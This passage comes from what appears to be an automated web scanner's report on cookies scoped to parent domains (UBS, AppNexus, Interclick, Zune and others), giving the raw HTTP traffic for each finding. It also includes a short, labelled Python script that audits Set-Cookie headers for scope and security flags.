The following cookie was issued by the application and is scoped to a parent of the issuing domain (the NavLB_EB cookie in the response below, with Domain=.ubs.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; its value (ebanking1.ubs.com, matching the redirect target in the Location header) looks like a load-balancer affinity marker rather than a credential. Note that although the response is served over HTTPS, the cookie carries no Secure attribute, so browsers will also send it over plain HTTP to any host under ubs.com. You should review the contents of the cookie to determine its function.

Request

GET /en/ HTTP/1.1
Host: ebanking.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/1/e/online.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:59:55 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_EB=ebanking1.ubs.com; Domain=.ubs.com; Path=/; Version=1; HttpOnly
Connection: close
Location: https://ebanking1.ubs.com:443/en/?NavLB_EB=1309960795
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 286
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

9.16. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (the sess, uuid2 and anj cookies in the response below, with domain=.adnxs.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=105966 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw))ByG5K)WgP%/zT#@:#8z-dUp)u]fwkNAf3WE5g%h%ksMZLow4G#V7_m:..iqG+b8]rH1.9<ktOde+dW=1iJ+Ar'n/Jw^sESpK8YPSkq')!p-gykgfN*Nur[3nJXya+Gmd486UM.Pm#'2N=*)ZaLb>@fJ1c#%)qL*oJoq0?!q:WwuOR=+o+0_Q_RWDtJ#gVm5)4<[`P/TTjh(s?Bw1EvKd+nb8sEFf=nnBmkoioWBp9)fb3AE#7d`e#P_F_muE!5Gb:-C6g<PYFc<c]BRSv#[Frf#FRzGk!_kjx1#$zVHqBa@YYuxdYm/8tto:XM?Mhe--/s09Y12!CeSFNR*/:>SPYuw2ftJID!)!vN!i[i8SR8swwOeo-'p%T42H(TOg!%w$1UJ_XK>nO:v#6isueX>9YlfuItK:x[60xq=gGzpNMNmpF29<N$IYh:bgLt^yAtpYT^qr(oscBbOe%XR:zc'v^/i0<VTlKRp8=O$.4-%bp#?B[XMsFivXc91M+qIjt:p8G(icTdxdu'snIh*.m*-EWc/SHSYmL!TMC1Lkob(Y*+(Zd*7D=h1z_kr>GJ_QDni<KP9l'uW7HPG'NJjK@Q9I<$k>A.rZvg.LgFR9kW0v?)_7A9)0xdK'c4#)-u'CsZGn?!Rjw6zWDal_u^`.CYU:LZdFchj/zZgN.(OA9BaccO@!`Mqu@Il%ADZf%UsNE[fpP#H_FUuTxRgh`3U$5p?43s#Jnb3cFRv<6TIN>fZHO>>LjO1l0#H.4>mB'pC0QO+gqS

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw))BAfzI)_c8i<lK#0Pn0I13%'hiiUjya]NePJuWIyt1!shO5+W]943^xjP-VZ[#v*7V*E?1lK7GeQXy%V*<X5zx]>^$7/zi5rMj5lo5_o3VW/ar7FCnRy^>>C7):gM6=r*i/#[pB=SYhiVs3JWW[xw:ivtn!CsFd61PLaw[[<DqkR$P4cs]+7urA@xYXfsUrZLg:tpzl70ZO)+geN%U1Z]J'4s!`?Xji#p[+yc]@WsXjaesPv3AskX__l1d??wa*+5K/WQa*kR$la!)<Cj'02sWS=WG$$j3>zgX=8EH4SDC8Z-/F4_'st9$`gbGQuBKVpBfqhdWwW5NR+e+3n_MG-%8`u(0RFuyB0hNX4N_h9>FBfLBgaO@U!Gj=YwrH[?*OaDXRY(Hwv_8g4-.'i+mf$4MZ5*Lu[ye43%+z'*x9d3!J]Y$0/b+I8#rbe^wI6`JMsCnw9mpb^XQti+CJ8i?LwtLX>!V1veMAp]t`?Io!t$TP6*l[-W63VEmULhD1hJwvnokI+S6BoE8JQ!2_3MZEa#HT#.Hl)7>`J58Yy*^ameq%S-i$R?fb>4xBPON5kf!5iIZ_YF(Z@q7ReF@c-%WXSTbieBIFN^Q7Ep91r0l#xmv*D<l<g)s3]t'#:x`sB80-wg+Rxj$'R8>9RF<xP+c1s!+(.c4w]6k*5mY:5<aZFNn7Z>)7d)0r7eYKtQxzBfVw0a:d$3Ns`+OctOR_)UV/oOWdU?CY_$S[Gl]_eLeT*cat-oSRicoEB.e1.C`tt-t'(UX_3nO6'[0_!>K(LiZ$plNwvB4`gM6t!v; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Wed, 06 Jul 2011 11:22:10 GMT
Content-Length: 0


9.17. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (the sgm cookie in the response below, with domain=.interclick.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=9787d0d4-9d7b-4605-985d-7786f61ba68e HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323; domain=.interclick.com; expires=Tue, 06-Jul-2021 15:39:03 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Wed, 06 Jul 2011 15:39:02 GMT

GIF89a.............!.......,...........D..;

9.18. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (the udm_0 cookie in the response below, with Domain=.revsci.net). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K08784 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=...[SNIP]...; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=...[SNIP]...; rsiPus_TE1N="...[SNIP]..."; rsi_us_1000000="...[SNIP]..."

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=...[SNIP]...; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:00:43 GMT; Path=/
Last-Modified: Wed, 06 Jul 2011 14:00:43 GMT
Cache-Control: max-age=3600, private
Expires: Wed, 06 Jul 2011 15:00:43 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:00:43 GMT
Content-Length: 5681

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

9.19. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (the C2, GUID and DBC cookies in the response below, with domain=advertising.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=msftie9drcpc_cs=1&betq=12682=433083 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; BASE=x7Q9ni23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHhGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOID7s5rzN9mUM7Zk/KlL!; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; F1=BQ+HN4EBAAAABAAAAUAAqBA; ROLL=U6APDjegFREW39A!; C2=swDFOFJwCob0FNysICwJoakBtKvAC0nhXLpwIg02FAHCdbdBwhwihXAcIwjmGAHCsGeBwhAQvaAcIQW4FAHCLppBwhAmhXAcIAY4FAHCdDmBwhAmoZAcIwtlGAHCEHoBwhwoyaAcIU1aGAHCBHoBwhgdeZAcIYZgGAHC1mpBwhgHXaAcI0soGAHCX8rBwhAG/aAcIYxvGAHCKopBwhQ2kXAcIUEoGAHCVGoBwhgh3ZAcRGQYmjohS0I9GsfzFU9shNwjkak1k6hA1WjBpD7gCw8jGp+tSLAr8ao60mvAz8qhr7qHGwyfGahh3iyKgW8q; GUID=MTMwOTk0ODk3MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 15:39:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=XGIFOFJwCob0FSRsKiwubaActKvAC0nxILpwIg02FFGCdbdRhhwihXUYIwjmGFGCsGeRhhAQvaUYIQW4FFGCLppRhhAmhXUYIAY4FFGCdDmRhhAmoZUYIwtlGFGCEHoRhhwoyaUYIU1aGFGCBHoRhhgdeZUYIYZgGFGC1mpRhhgHXaUYI0soGFGCX8rRhhAG/aUYIYxvGFGCKopRhhQ2kXUYIUEoGFGCVGoRhhgh3ZUYRGQYmjoxD0I9GsfzFZ8shNwjka4xk6hA1WjRaD7gCw8jGu9tSLAr8a820mvAz8qxc7qHGwyfGfgh3iyKgWQn; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: GUID=MTMwOTk2Njc0MzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Wed, 06 Jul 2011 16:39:03 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

9.20. https://live.zune.net/xweb/passport/bottomCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7554
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 4813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
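
One way to run the check the issue detail asks for, as an added example that is not part of the XSS.CX report or of the scanner's own output: a small Python audit that parses Set-Cookie values, flags a Domain attribute naming a parent of the issuing host (the scanner's criterion for this finding), and notes cookies issued over https without Secure or without HttpOnly. The sample input is constructed from Set-Cookie lines shown in this section of the report; the function and field names are the example's own.

```python
"""Audit Set-Cookie headers for parent-domain scope and missing flags.

Added example, not scanner output. The SAMPLE dict below is constructed from
Set-Cookie values that appear in the responses recorded in this report.
"""
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class CookieAudit:
    name: str
    domain: Optional[str]        # Domain attribute as sent (None = host-only cookie)
    parent_scoped: bool          # Domain names a proper parent of the issuing host
    http_only: bool
    secure: bool
    notes: list = field(default_factory=list)


def is_parent_domain(host: str, domain: Optional[str]) -> bool:
    """True when `domain` is a proper parent of `host` (the scanner's criterion).

    Per RFC 6265 a Domain attribute equal to the host itself also turns the cookie
    into a domain cookie that subdomains receive; that case is deliberately not
    flagged here so the result matches what the report marks as parent-scoped.
    """
    if not domain:
        return False
    d, h = domain.lower().lstrip("."), host.lower()
    return h != d and h.endswith("." + d)


def parse_set_cookie(host: str, header_value: str) -> CookieAudit:
    """Parse one Set-Cookie value (everything after 'Set-Cookie: ')."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()   # value may itself contain '='
    domain: Optional[str] = None
    http_only = secure = False
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "domain":
            domain = val.strip() or None
        elif key == "httponly":
            http_only = True
        elif key == "secure":
            secure = True
    return CookieAudit(name, domain, is_parent_domain(host, domain), http_only, secure)


def audit(scheme: str, host: str, set_cookie_values: list) -> list:
    """Annotate each cookie with the points a reviewer would check."""
    results = []
    for value in set_cookie_values:
        c = parse_set_cookie(host, value)
        if c.parent_scoped:
            c.notes.append(f"sent to every host under {c.domain.lstrip('.')}; review its contents")
        if scheme == "https" and not c.secure:
            c.notes.append("issued over https without the Secure flag")
        if not c.http_only:
            c.notes.append("readable from script (no HttpOnly)")
        results.append(c)
    return results


# Constructed sample: Set-Cookie values copied from responses shown in this report.
SAMPLE = {
    ("https", "live.zune.net"): [
        "EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/",
        "lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/",
        "supportedTuner=Undefined; path=/",
    ],
    ("http", "m.adnxs.com"): [
        "uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:11 GMT; domain=.adnxs.com; HttpOnly",
    ],
    ("https", "msnia.login.live.com"): [
        "MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b; domain=login.live.com;path=/;version=1",
    ],
}


def run_sample() -> dict:
    """Audit every host in SAMPLE; returns {host: [CookieAudit, ...]}."""
    return {host: audit(scheme, host, values) for (scheme, host), values in SAMPLE.items()}


if __name__ == "__main__":
    for host, cookies in run_sample().items():
        for c in cookies:
            print(f"{host:24} {c.name:18} domain={c.domain!s:16} "
                  f"parent_scoped={c.parent_scoped} {'; '.join(c.notes)}")
```

Two things worth keeping in mind when reading the output. The parent-scope test mirrors the scanner and only fires for a Domain that is a proper parent of the host; under RFC 6265 any non-empty Domain attribute, even one equal to the host, already makes the cookie a domain cookie, so a stricter audit would also flag that case. And "no session token" is a judgement about the value, not the attributes: an opaque value such as the BSID cookie in 9.21 still deserves a look at what the application does with it before the finding is closed as informational.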

9.21. https://live.zune.net/xweb/passport/rightCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: b2db948c-3538-4620-8179-ed9314b7b5a4,734190
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: z_dto_minfo=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: supportedTuner=Undefined; path=/
Set-Cookie: z_email=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:01 GMT
Connection: close
Content-Length: 5984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

9.22. https://live.zune.net/xweb/passport/topCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

9.23. http://m.adnxs.com/msftcookiehandler

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dE361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
